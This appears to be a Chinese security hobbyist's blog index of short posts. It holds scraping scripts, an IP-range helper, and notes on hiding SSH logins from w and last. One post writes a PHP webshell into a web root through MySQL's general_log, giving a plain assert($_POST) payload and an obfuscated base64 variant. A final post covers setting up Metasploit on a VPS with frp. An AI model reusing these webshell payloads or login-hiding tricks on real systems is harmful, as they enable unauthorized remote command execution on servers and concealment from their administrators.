Bugcloud-POC

Bugcloud-POC

[] [centos_shell]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import time
import datetime
import os
import re
import random
headers = {
    'accept': 'application/json, text/plain, */*',
    'Host': '192.168.****',
    'Referer': 'http://192.168.****/',
    'cookie': '****',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
}
def get_page(url):
    try:
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            return response.json()
    except requests.ConnectionError as e:
        print('Error', e.args)
def mkdir(path):
    import os
    # 去除首位空格
    path = path.strip()
    # 去除尾部 \ 符号
    path = path.rstrip("\\")
    # 判断路径是否存在
    # 存在     True
    # 不存在   False
    isExists = os.path.exists(path)
    # 判断结果
    if not isExists:
        os.makedirs(path)
        print("OK")
        return True
    else:
        print("False")
        return False
def validateTitle(title):
    rstr = r"[\/\\\:\*\?\"\<\>\|]"  # '/ \ : * ? " < > |'
    new_title = re.sub(rstr, "_", title)  # 替换为下划线
    return new_title
def savefile(atype,aname,bugname,bugcode):
    file = os.path.join(atype,aname)
    mkdir(file)
    file = file + '\\'
    print(file)
    with open(file + bugname, 'a+') as f:
        f.write(bugcode)
if __name__ == '__main__':
    page = 0
    while (1):
        page = page + 1
        url = "http://192.168.****/cloud/pluginvuln/?page=" + str(page)
        print(url)
        time.sleep(random.randint(1,10))
        json_dict = get_page(url)
#        print(json_dict)
        items = json_dict['results']
        for item in items:
            title = item['plugin']['title']
            code = item['plugin']['source_code']
            type = item['vtype']
            appname = item['fp_app_name']
            newtitle = validateTitle(title)
            try:
                savefile(str(type),str(appname),str(newtitle),code)
            except Exception as e:
                cotent = str(type) + str(appname) + str(newtitle)
                with open("error.txt", 'a+') as f:
                    f.write(cotent)
                continue
            print(title,type,appname)
python

xiaoxiaofuli

APK–API

[] [centos_shell]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import time
import datetime
import re
import random
headers = {
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Host': 'www.js.baidu.com.ylgsrnzxlxpyb9cenfdfef6g.com',
    'Accept-Encoding': 'gzip',
    'cookie': '__cfduid=dbc9ff34639e222aa9cc0eb395de4d41b1539066777',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
}
def get_page(url):
    try:
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            return response.json()
    except requests.ConnectionError as e:
        print('Error', e.args)
        
if __name__ == '__main__':
    page = 0
    while (1):
        url = "http://www.js.baidu.com.ylgsrnzxlxpyb9cenfdfef6g.com/api/public/?service=Video.getNearby&uid=-1&lng=0.0&lat=0.0&p=" + str(page)
#        print(url)
        time.sleep(random.randint(1,10))
        json_dict = get_page(url)
        print(page)
        page = page + 1       
#        print(json_dict)
        items = json_dict['data']['info']
        for item in items:
            uid = item['uid']
            href = item['href']
            with open("urlaaaaa.txt", 'a+') as f:
                f.write(href)
            continue

python

SSH login history Hide

w和last命令内不显示登录痕迹

ssh -lroot 127.0.0.1 /usr/bin/bash  #登录之后直接调用bash

ssh -lroot 127.0.0.1 /usr/bin/ls   #登录之后直接调用命令

ssh -T root@127.0.0.1 /usr/bin/bash -i  # -T表示不分配伪终端 -i表示是交互式shell

查找登录痕迹

lsof -i:22 | grep EST

ps -ef | grep ssh

历史痕迹:

/var/log/secure
/var/log/auth.log
笔记

互联网资产搜集思路<更新中...>

给定域名、部分IP:

整理成C段IP,

[] [centos_shell]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/python
# -*- coding:utf-8 -*-
#exp:192.168.1.1  >>>  192.168.1.0/24
import re
 
# def cleanCLRFspace(content):
# 	noCLContext = content.replace('\n','')
# 	noSpaceCLRFcontext = noCLContext.strip()
# 	return noSpaceCLRFcontext
 
def readFile():
	ipf = open('./content.txt','r')
	return ipf
 
def getLineIP(ipf):
	ipList = set()
	texts = ipf.readlines()
	for text in texts:
		ips = re.findall(r'\d+\.\d+?\.\d+?\.\d+?',text)
		for ip in ips:
			ipList.add(ip)
	return ipList
 
 
def ip2c(ipNoDup):
	ipset = set()
	for ip in ipNoDup:
		ipset.add(re.findall(r'\d+?\.\d+?\.\d+?\.',ip)[0] + '0/24')
	iplist = list(ipset)
	iplist.sort()
	return iplist
 
 
 
def saveContext(s):
	wfile = open('./result.txt','w')
	for i in s:
		wfile.write(i+'\n')
	wfile.close()
 
if __name__ == '__main__':
	ipf = readFile()
	ipList = getLineIP(ipf)
	iplist = ip2c(ipList)
	saveContext(iplist)
笔记

more >>

Ziroom--Monitor

[] [centos_shell]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import itchat
import time
import datetime
#itchat.auto_login()
itchat.auto_login(hotReload=True)
itchat.auto_login(enableCmdQR=-1)
#from urllib import request
url = "http://phoenix.ziroom.com/v7/room/detail.json?house_id=62947781&city_code=110000&id=61544148"
headers = {
    'accept': 'application/json;version=3',
    'Host': 'phoenix.ziroom.com',
    'Referer': 'https://hd.ziroom.com/2018/haiyan/index.html?citycode=110000',
#    'token': 'd76a826e-bfb4-4421-902e-132418ebedfa',
    'User-Agent': 'okhttp/3.10.0',
}
def get_page(url):
    try:
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            return response.json()
    except requests.ConnectionError as e:
        print('Error', e.args)



if __name__ == '__main__':
    n = 0
    while (1):
        n = n+1
        json_dict = get_page(url)
#        print(json_dict)
        statuss = json_dict['data']['status']
        nowTime=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        print("status:",statuss)
        if statuss == 'zxpzz':
            print("NOt Time!!!")
            itchat.send('<'+str(n)+'>'+'骚年~装修配置中>>>'+nowTime, toUserName='filehelper')
            time.sleep(360)
        else:
            print("GOGOGOOGOOO!!!!!")
            itchat.send('<'+str(n)+'>'+'0o0o0o0~可以预定了--gogogogo>>>'+nowTime, toUserName='filehelper')
            time.sleep(120)
python

MySQL's general-log shell

MySQL ROOT:

show variables like '%general%';
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['cmd']));?>";
set global general_log = off;
shell

Frp结合VPS打造外网Meatsploit

  • 前言:

本来一开始是在Vps上直接安装的MSF,想安装的可以试试,附一键脚本:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall && ./msfinstall
msf

more >>

|